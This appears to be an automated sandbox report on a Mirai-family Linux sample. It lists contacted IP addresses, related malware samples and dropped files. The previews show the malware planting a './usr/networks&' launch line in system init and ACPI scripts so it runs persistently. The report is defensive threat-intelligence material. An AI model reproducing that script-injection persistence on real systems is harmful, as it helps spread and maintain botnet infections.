                                      134111CSIRO-PAWSEY-AS-APCommonwealthScientificandIndustrialRefalse
                                      99.68.211.56
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      183.198.167.74
                                      unknownChina
                                      24547CMNET-V4HEBEI-AS-APHebeiMobileCommunicationCompanyLimitfalse
                                      42.195.235.92
                                      unknownChina
                                      4249LILLY-ASUSfalse
                                      179.44.29.229
                                      unknownVenezuela
                                      22927TelefonicadeArgentinaARfalse
                                      185.146.255.225
                                      unknownSlovenia
                                      12637SEEWEBWebhostingcolocationandcloudservicesITfalse
                                      110.201.254.255
                                      unknownChina
                                      9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                                      186.64.66.12
                                      unknownArgentina
                                      27953NODOSUDSAARfalse
                                      196.145.188.64
                                      unknownEgypt
                                      36935Vodafone-EGfalse
                                      166.215.143.20
                                      unknownUnited States
                                      20057ATT-MOBILITY-LLC-AS20057USfalse
                                      86.173.157.107
                                      unknownUnited Kingdom
                                      2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                                      121.147.69.6
                                      unknownKorea Republic of
                                      4766KIXS-AS-KRKoreaTelecomKRfalse
                                      169.200.6.135
                                      unknownUnited States
                                      37611AfrihostZAfalse
                                      135.212.234.40
                                      unknownUnited States
                                      14962NCR-252USfalse
                                      157.117.145.215
                                      unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                                      48.228.127.190
                                      unknownUnited States
                                      2686ATGS-MMD-ASUSfalse
                                      69.208.204.193
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      24.70.74.70
                                      unknownCanada
                                      6327SHAWCAfalse
                                      27.93.232.244
                                      unknownJapan2516KDDIKDDICORPORATIONJPfalse
                                      21.250.77.95
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      145.109.132.127
                                      unknownNetherlands
                                      1124UVA-NLUniversiteitvanAmsterdamEUfalse
                                      196.246.242.56
                                      unknownSouth Africa
                                      136525WANCOMPVTLTD-AS-APWancomPvtLtdPKfalse
                                      74.252.107.163
                                      unknownUnited States
                                      8103STATE-OF-FLAUSfalse
                                      110.90.140.46
                                      unknownChina
                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                      64.135.171.93
                                      unknownUnited States
                                      14755MHOUSfalse
                                      65.69.158.191
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      90.59.26.112
                                      unknownFrance
                                      3215FranceTelecom-OrangeFRfalse
                                      49.251.156.129
                                      unknownJapan9617ZAQJupiterTelecommunicationsCoLtdJPfalse
                                      208.255.157.190
                                      unknownUnited States
                                      11486COLO-PREM-VZBUSfalse
                                      112.112.162.32
                                      unknownChina
                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                      104.230.204.91
                                      unknownUnited States
                                      10796TWC-10796-MIDWESTUSfalse
                                      159.180.12.14
                                      unknownUnited Kingdom
                                      15435KABELFOONDELTAFiberNederlandNLfalse
                                      63.197.43.77
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      105.203.225.97
                                      unknownEgypt
                                      36992ETISALAT-MISREGfalse
                                      196.86.20.114
                                      unknownMorocco
                                      6713IAM-ASMAfalse
                                      162.219.217.19
                                      unknownUnited States
                                      26375AIRESPRINGUSfalse
                                      163.11.112.95
                                      unknownUnited States
                                      600OARNET-ASUSfalse
                                      202.97.251.215
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      104.237.129.81
                                      unknownUnited States
                                      63949LINODE-APLinodeLLCUSfalse
                                      217.115.101.190
                                      unknownUkraine
                                      25133MCLAUT-ASUAfalse
                                      38.230.130.96
                                      unknownUnited States
                                      174COGENT-174USfalse
                                      216.106.18.59
                                      unknownUnited States
                                      4581SOCKETUSfalse
                                      81.105.100.217
                                      unknownUnited Kingdom
                                      5089NTLGBfalse
                                      60.218.221.24
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      221.203.40.250
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      84.137.36.56
                                      unknownGermany
                                      3320DTAGInternetserviceprovideroperationsDEfalse
                                      75.246.178.204
                                      unknownUnited States
                                      22394CELLCOUSfalse
                                      91.42.40.52
                                      unknownGermany
                                      3320DTAGInternetserviceprovideroperationsDEfalse
                                      208.222.209.253
                                      unknownUnited States
                                      701UUNETUSfalse
                                      65.11.249.192
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      135.179.138.11
                                      unknownUnited States
                                      14962NCR-252USfalse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      57.37.47.90sora.arm.elfGet hashmaliciousMiraiBrowse
                                        67.144.225.171opem6lHNzL.elfGet hashmaliciousUnknownBrowse
                                          766X0ABLoy.elfGet hashmaliciousMiraiBrowse
                                            93.211.180.34xd.arm.elfGet hashmaliciousMiraiBrowse
                                              210.78.153.86arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                xd.arm7Get hashmaliciousMiraiBrowse
                                                  hoho.arm7Get hashmaliciousMiraiBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    dht.transmissionbt.combin.sh.elfGet hashmaliciousMiraiBrowse
                                                    • 87.98.162.88
                                                    bin.sh.elfGet hashmaliciousMiraiBrowse
                                                    • 212.129.33.59
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 87.98.162.88
                                                    SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                                                    • 212.129.33.59
                                                    SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                                                    • 212.129.33.59
                                                    SecuriteInfo.com.Riskware.OfferCore.5002.4698.exeGet hashmaliciousPrivateLoaderBrowse
                                                    • 87.98.162.88
                                                    5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zipGet hashmaliciousXmrigBrowse
                                                    • 87.98.162.88
                                                    240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                                    • 87.98.162.88
                                                    240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                                    • 87.98.162.88
                                                    5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zipGet hashmaliciousXmrigBrowse
                                                    • 87.98.162.88
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    UninetSAdeCVMXf5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                    • 189.167.22.36
                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 189.255.81.119
                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 187.130.152.13
                                                    i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 187.227.9.205
                                                    sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                    • 187.204.38.179
                                                    mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 187.168.181.238
                                                    sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 189.238.52.132
                                                    sora.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 187.135.22.8
                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                    • 189.233.26.173
                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                    • 189.144.247.21
                                                    CHINATELECOM-GUANGDONG-IDCGuangdongCNsora.m68k.elfGet hashmaliciousMiraiBrowse
                                                    • 113.107.203.213
                                                    la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 113.106.27.182
                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                    • 125.94.208.147
                                                    pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                    • 125.89.250.181
                                                    arm5.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 14.119.90.9
                                                    arm4.elfGet hashmaliciousMiraiBrowse
                                                    • 125.94.208.145
                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                    • 113.107.251.186
                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 113.103.45.130
                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                    • 183.47.198.250
                                                    yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 121.12.193.167
                                                    KIXS-AS-KRKoreaTelecomKRarm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 222.109.250.96
                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 121.177.189.157
                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 182.237.88.235
                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 221.155.94.3
                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 125.146.77.111
                                                    arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 183.126.112.54
                                                    powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 175.234.47.255
                                                    i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 210.217.73.153
                                                    sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 125.150.133.25
                                                    armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 14.61.110.255
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    /etc/init.d/S95baby.shbin.sh.elfGet hashmaliciousMiraiBrowse
                                                      bin.sh.elfGet hashmaliciousMiraiBrowse
                                                        bin.sh.elfGet hashmaliciousMiraiBrowse
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                            bin.sh.elfGet hashmaliciousMiraiBrowse
                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                bin.shGet hashmaliciousMiraiBrowse
                                                                  bin.shGet hashmaliciousMiraiBrowse
                                                                    3aakN9FzA5Get hashmaliciousGafgyt MiraiBrowse
                                                                      Mozi.m.3Get hashmaliciousMiraiBrowse
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):5.2904323771702915
                                                                        Encrypted:false
                                                                        SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                        MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                        SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                        SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                        SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):157
                                                                        Entropy (8bit):4.412729940630044
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                        MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                        SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                        SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                        SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):636
                                                                        Entropy (8bit):4.722087767454589
                                                                        Encrypted:false
                                                                        SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                        MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                        SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                        SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                        SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):483
                                                                        Entropy (8bit):4.215331622973397
                                                                        Encrypted:false
                                                                        SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                        MD5:07889D65619CDB80F8E876A087F160D3
                                                                        SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                        SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                        SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):266
                                                                        Entropy (8bit):4.77497394042067
                                                                        Encrypted:false
                                                                        SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                        MD5:5E3A15E41D35EC409613236A20B5783E
                                                                        SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                        SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                        SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):297
                                                                        Entropy (8bit):4.680424868813
                                                                        Encrypted:false
                                                                        SSDEEP:6:aJGzAuCuzHB/unOJufu+/ugEWR+V18yjPn:aJcvzHBmnO4G7gEWQ18yTn
                                                                        MD5:10400BA156D6BC78E67D90A86A2906D4
                                                                        SHA1:D4D7BA30B85ABA9FC08EC0C990651601128B2A74
                                                                        SHA-256:D348A8461FB9190DCBD6CF35575B2C4799E04AA4E359EA921F8723C9FDAA457A
                                                                        SHA-512:25B5C137961E10987A0BBF19AD7CCABC865A7DF7325D3C7B0B0C9BBDB68D5C4470B012A720FA43B707705ACB8FD8DD834AF3DCF7AEA3284A5587EC3E9212E9B3
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 0.fi.kbd_mode '-u' < '/dev/tty1' .kbd_mode '-u' < '/dev/tty2' .kbd_mode '-u' < '/dev/tty3' .kbd_mode '-u' < '/dev/tty4' .kbd_mode '-u' < '/dev/tty5' .kbd_mode '-u' < '/dev/tty6' .loadkeys '/etc/console-setup/cached_UTF-8_del.kmap.gz' > '/dev/null' ../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:POSIX shell script, ASCII text executable
                                                                        Category:dropped
                                                                        Size (bytes):25
                                                                        Entropy (8bit):3.8936606896881854
                                                                        Encrypted:false
                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: bin.sh.elf, Detection: malicious, Browse
                                                                        • Filename: bin.sh.elf, Detection: malicious, Browse
                                                                        • Filename: bin.sh.elf, Detection: malicious, Browse
                                                                        • Filename: na.elf, Detection: malicious, Browse
                                                                        • Filename: bin.sh.elf, Detection: malicious, Browse
                                                                        • Filename: na.elf, Detection: malicious, Browse
                                                                        • Filename: bin.sh, Detection: malicious, Browse
                                                                        • Filename: bin.sh, Detection: malicious, Browse
                                                                        • Filename: 3aakN9FzA5, Detection: malicious, Browse
                                                                        • Filename: Mozi.m.3, Detection: malicious, Browse
                                                                        Preview:#!/bin/sh./usr/networks&.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):85
                                                                        Entropy (8bit):3.542211979287425
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
                                                                        MD5:C0EB4B74AA083DE0731C7411490F5680
                                                                        SHA1:91FE8A766B188646A140A0272D115A4E98F5587B
                                                                        SHA-256:B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
                                                                        SHA-512:4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
                                                                        Malicious:true
                                                                        Preview:./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):85
                                                                        Entropy (8bit):3.542211979287425
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
                                                                        MD5:C0EB4B74AA083DE0731C7411490F5680
                                                                        SHA1:91FE8A766B188646A140A0272D115A4E98F5587B
                                                                        SHA-256:B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
                                                                        SHA-512:4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
                                                                        Malicious:true
                                                                        Preview:./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
